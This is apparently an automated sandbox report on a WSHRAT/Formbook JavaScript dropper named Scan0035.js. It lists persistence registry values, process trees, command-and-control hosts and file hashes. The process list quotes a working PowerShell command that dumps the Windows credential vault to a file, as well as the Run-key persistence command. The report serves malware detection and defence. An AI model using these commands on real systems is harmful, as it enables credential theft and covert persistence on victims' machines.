Malware Analysis Report

2025-04-14 08:31

Sample ID 220216-2z4zqsebb7
Target Scan0035.js
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
Tags
formbook wshrat my7g collection persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9

Threat Level: Known bad

The file Scan0035.js was found to be: Known bad.

Malicious Activity Summary

formbook wshrat my7g collection persistence rat spyware stealer trojan

WSHRAT

Formbook

Nirsoft

Formbook Payload

NirSoft MailPassView

Executes dropped EXE

Blocklisted process makes network request

Reads user/profile data of web browsers

Drops startup file

Checks computer location settings

Adds Run key to start application

Accesses Microsoft Outlook accounts

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Gathers network information

Suspicious behavior: GetForegroundWindowSpam

Script User-Agent

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-16 23:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-16 23:02

Reported

2022-02-16 23:05

Platform

win7-en-20211208

Max time kernel

169s

Max time network

190s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook Payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js C:\Windows\System32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\cmdc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1040 set thread context of 1200 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 1140 set thread context of 1200 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|C435AF30|VQVVOAJK|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 16/2/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
N/A N/A C:\Windows\SysWOW64\mstsc.exe N/A
N/A N/A C:\Windows\SysWOW64\mstsc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\mstsc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1564 wrote to memory of 820 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1564 wrote to memory of 820 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1564 wrote to memory of 820 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 820 wrote to memory of 1040 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 820 wrote to memory of 1040 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 820 wrote to memory of 1040 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 820 wrote to memory of 1040 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 1200 wrote to memory of 1140 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 1200 wrote to memory of 1140 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 1200 wrote to memory of 1140 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 1200 wrote to memory of 1140 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 1140 wrote to memory of 316 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 316 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 316 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 316 N/A C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\cmd.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 816 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 816 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 816 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 816 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 816 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 816 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 820 wrote to memory of 1992 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 1992 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 1992 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1992 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1992 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 820 wrote to memory of 736 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 736 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 736 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 736 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 992 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 992 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 992 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 992 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 992 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 992 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 820 wrote to memory of 1616 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1616 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1616 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1616 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1952 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 1952 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 1952 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 1952 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1952 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1952 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1548 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\cmdc.exe
PID 820 wrote to memory of 1524 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 1524 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe
PID 820 wrote to memory of 1524 N/A C:\Windows\System32\wscript.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0035.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan0035.js"

C:\Users\Admin\AppData\Roaming\bin.exe

"C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\SysWOW64\mstsc.exe

"C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.kk88126.com udp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.a1-a2-ehliyet.xyz udp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.meredithandlance.com udp
US 3.234.57.73:80 www.meredithandlance.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.alibabasite.com udp
AU 172.105.162.84:80 www.alibabasite.com tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.alleinerziehend.love udp
DE 217.160.243.50:80 www.alleinerziehend.love tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 154.127.53.102:7121 154.127.53.102 tcp
US 8.8.8.8:53 www.dekolijubu.rest udp
US 154.127.53.102:7121 154.127.53.102 tcp

Files

C:\Users\Admin\AppData\Roaming\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js

MD5 ad65c8c29d312119ad339adc8b699025
SHA1 4c04e6c3a2d0ecd059265fba70356277723dd12b
SHA256 9721db64a4674e5b1a6285114ffa9894f34a638dc827a2ca2972c91cc54f63d9
SHA512 0d967d7beb9c8fa8ff806678fcdd241ea0600bcd4a7399fa640d49d823036dc00b59697dffc801aa4369c12760c79e4e8ed6ae141e9e26371dc2608cbdfa709d

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

memory/1040-58-0x000000000097F000-0x0000000000980000-memory.dmp

memory/1040-57-0x0000000000B20000-0x0000000000E23000-memory.dmp

memory/1040-59-0x0000000000130000-0x0000000000144000-memory.dmp

memory/1200-60-0x0000000004D50000-0x0000000004E1C000-memory.dmp

memory/1140-61-0x0000000075B51000-0x0000000075B53000-memory.dmp

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 61a9ea670e5ace0c0b4713de4a5ee617
SHA1 1f74d817f245c136ea1960be91da994414d7d50d
SHA256 9111d77c08078d5af636aa2e765bce0891704acdd1fd0a325605e0aaf42d4d97
SHA512 88348c23255de8214fe636ec0c0d97be12f36c5ec5437ea8096b171d86b3b8a5b0f1cc56798f568b01345584bc3c49f6b42d75b75694ec601484b2e10941ad7b

memory/1140-63-0x0000000000C20000-0x0000000000D24000-memory.dmp

memory/1140-64-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/1140-65-0x0000000002130000-0x0000000002433000-memory.dmp

memory/1140-66-0x0000000000650000-0x00000000006E3000-memory.dmp

memory/1200-67-0x0000000008080000-0x00000000081F0000-memory.dmp

memory/1548-68-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp

memory/1548-70-0x000007FEF4DFE000-0x000007FEF4DFF000-memory.dmp

memory/1548-71-0x00000000025B0000-0x00000000025B2000-memory.dmp

memory/1548-72-0x00000000025B2000-0x00000000025B4000-memory.dmp

memory/1548-73-0x00000000025B4000-0x00000000025B7000-memory.dmp

memory/1548-69-0x000007FEF26D0000-0x000007FEF322D000-memory.dmp

memory/1548-74-0x00000000025BB000-0x00000000025DA000-memory.dmp

C:\Users\Admin\AppData\Roaming\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Roaming\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

C:\Users\Admin\AppData\Roaming\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Roaming\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-16 23:02

Reported

2022-02-16 23:05

Platform

win10v2004-en-20220113

Max time kernel

167s

Max time network

179s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook Payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0035.js C:\Windows\System32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0035 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan0035.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
